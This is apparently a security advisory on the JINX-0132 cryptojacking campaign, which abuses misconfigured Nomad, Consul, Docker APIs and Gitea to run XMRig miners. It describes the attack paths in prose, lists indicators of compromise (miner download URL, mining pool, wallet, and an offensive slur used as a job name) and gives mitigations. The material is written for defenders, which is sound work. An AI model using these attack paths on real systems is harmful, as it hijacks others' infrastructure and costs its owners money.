Cryptojacking Campaign Targeting DevOps Platforms (JINX-0132)
June 4th, 2025
Severity Level: High
Technical Details
The JINX-0132 campaign targets misconfigured and exposed DevOps tools—primarily HashiCorp Nomad, Consul, Docker Engine API, and Gitea—to deploy XMRig cryptocurrency miners. In Nomad, attackers exploit the default-permissive job API to remotely submit jobs that execute shell commands, downloading the miner directly from GitHub. Offensive or arbitrary job names are often used to avoid detection.
In Consul, the attacker registers rogue services and leverages script-based health checks to execute mining payloads. Without adequate access control lists (ACLs), this method enables remote code execution across connected nodes.
Misconfigured Docker APIs exposed to the internet (tcp://0.0.0.0:2375/2376) allow attackers to create privileged containers, mount host filesystems, and deploy miners with root access. Gitea instances are compromised through various paths, including CVE-2020-14144 and insecure installation scripts, which permit attackers to gain administrative access or execute malicious Git hooks.
The attacker avoids custom malware, instead relying on official open-source tools and public repositories—particularly GitHub—to deliver payloads. This “living-off-open-source” approach minimizes forensic evidence, with the only consistent indicator of compromise (IOC) being the Monero wallet address used for mining rewards.
Our Cyber Threat Intelligence Unit has recently identified a cryptojacking campaign orchestrated by the threat actor JINX-0132, which is actively exploiting vulnerable and misconfigured DevOps platforms, including HashiCorp Nomad, Consul, Docker Engine API, and Gitea. The attacker leverages public misconfigurations, default settings, and known vulnerabilities to deploy XMRig Monero mining software, effectively hijacking system resources for illicit cryptocurrency mining.
The campaign was detailed in a threat report by Wiz Research, marking the first documented instance of in-the-wild abuse of publicly exposed Nomad servers. This operation reflects a growing trend of “living-off-open-source” tactics, where attackers use legitimate tools and public infrastructure to evade detection and attribution.
Impact
Financial Cost: Unauthorized cryptocurrency mining leads to excessive cloud computing usage, resulting in significant financial expenses.
Operational Risk: High CPU and memory usage diminish service performance and availability.
Security Exposure: Compromised platforms can serve as pivot points for lateral movement within cloud environments.
Attribution Challenge: The use of public tools and legitimate binaries hinders traditional detection and forensic analysis.
Detection Method
Detecting this threat requires a multi-layered approach that includes endpoint monitoring, memory analysis, and tracking abnormal or unauthorized job submissions in Nomad.
Analyze service registration and script-based health checks in Consul.
Monitor API activity on Docker ports 2375 and 2376, especially for external requests.
Flag downloads of XMRig binaries or command executions from GitHub on servers.
Track outbound connections to known Monero mining pools (e.g., pool.supportxmr.com:443).
Utilize file integrity monitoring and behavioral analytics to detect and identify unexpected miner processes.
Indicators of Compromise
Type | Value | Description |
XMRig Hash | ea7c97294f415dc8713ac8c280b3123da62f6e56 | Official XMRig v6.22.2 binary |
Monero Wallet | 468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e 2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E | Used for Mining Rewards |
Nomad Task Group Name | NIGNOG | Static offensive term used in malicious jobs |
Mining Pool | pool.supportxmr.com:443 | Known destination in mining config |
Payload Source | https://github.com/xmrig/xmrig/releases/downloa d/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz | Miner download URL used in the attack |
Recommendations
To mitigate the risks associated with this threat, organizations should take the following actions:
Implement strict access control lists (ACLs) for Nomad APIs and restrict access to job submission only to authorized users.
Disable unauthenticated or unnecessary script checks in Nomad and Consul.
Configure Consul with ACLs and verify all service registration processes.
Restrict Docker API exposure to internal interfaces only.
Use TLS encryption and authentication for Docker API access.
Regularly patch and update Gitea instances to address known vulnerabilities.
Disable or strictly control git hook permissions in Gitea.
Secure installer scripts post-deployment in Gitea environments.
Monitor for downloads of mining tools and unusual container activity.
Block outbound connections to known Monero mining pools.
Continuously audit exposed services using tools like Shodan or CSP-native posture tools.
Segment network zones and implement zero-trust access principles.
Deploy runtime security tools that detect misuse of containers or APIs.
Conclusion
The JINX-0132 cryptojacking campaign underscores the substantial risk posed by misconfigured DevOps infrastructure in contemporary cloud environments. By exploiting default settings and public APIs, attackers can achieve remote code execution without the need for custom malware, making traditional detection methods less effective.
Organizations must implement a defense-in-depth strategy by securing APIs, hardening configurations, and continuously monitoring their cloud surface. With high operational stealth and real financial impact, campaigns like JINX-0132 represent a critical security concern for any organization utilizing cloud-native DevOps platforms.
References
https://cyberpress.org/cybercriminals-leverage-devops-web-server-flaws/
https://securityaffairs.com/178548/cyber-crime/cryptojacking-campaign-relies-on-devops-tools.html
https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html
https://gbhackers.com/threat-actors-exploit-devops-web-server-misconfigurations/